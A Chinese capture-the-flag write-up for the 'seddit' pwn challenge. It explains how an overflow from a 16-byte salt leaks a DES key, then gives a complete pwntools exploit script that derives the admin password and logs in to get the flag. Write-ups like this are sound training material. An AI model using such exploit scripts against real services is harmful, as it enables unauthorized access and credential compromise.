seddit
首先,检查一下程序的保护机制
然后,我们用IDA分析一下
是一个模拟登陆的程序,密码就是用户名用salt+key来加密后的结果
只要我们能够成功登陆admin账号,就能输出答案
溢出点在这
我们可以让salt的长度为16,这样,key的内容就会写到v5的地址处,这样我们后面再输出,就能得到key,然后我们加密admin字符串,即可得到密码登陆
综上,我们的exp脚本
#coding:utf8
from pwn import *
from ctypes import *
import binascii
sh = process('./seddit')
#sh = remote('111.198.29.45',49317)
cryptolib = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libcrypto.so.1.0.0')
def register(salt):
sh.sendlineafter('What would you like to do?','1')
sh.sendlineafter('Enter username:','seaase')
sh.sendlineafter('Enter salt:',salt)
def login(password):
sh.sendlineafter('What would you like to do?','2')
sh.sendlineafter('Enter username:','admin')
sh.sendlineafter('Enter password:',password)
def show():
sh.sendlineafter('What would you like to do?','3')
sh.sendlineafter('Title:','Leak')
sh.sendlineafter('What type of post?','0')
payload = 'a'*0x10
register(payload)
#泄露key
show()
sh.recvuntil('content: ')
key = sh.recvuntil('\n',drop = True)[0:7]
print 'key=',key
passwd = 'a'*7 + key
user = 'admin'
#加密,得到密码
key = (c_char * 8)('\x00')
des_key_schedule = (c_char * 128)('\x00')
ans_out = (c_char * 256)('\x00')
cryptolib.DES_string_to_key(passwd,key)
cryptolib.DES_set_key(key,des_key_schedule)
cryptolib.DES_ecb_encrypt(user,ans_out,des_key_schedule,1)
password = ''
for i in range(len(ans_out)):
c = ans_out[i]
if c == '\x00':
break;
password += c
password = binascii.b2a_hex(password)
print 'password=',password
#得到flag
login(password)
sh.interactive()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
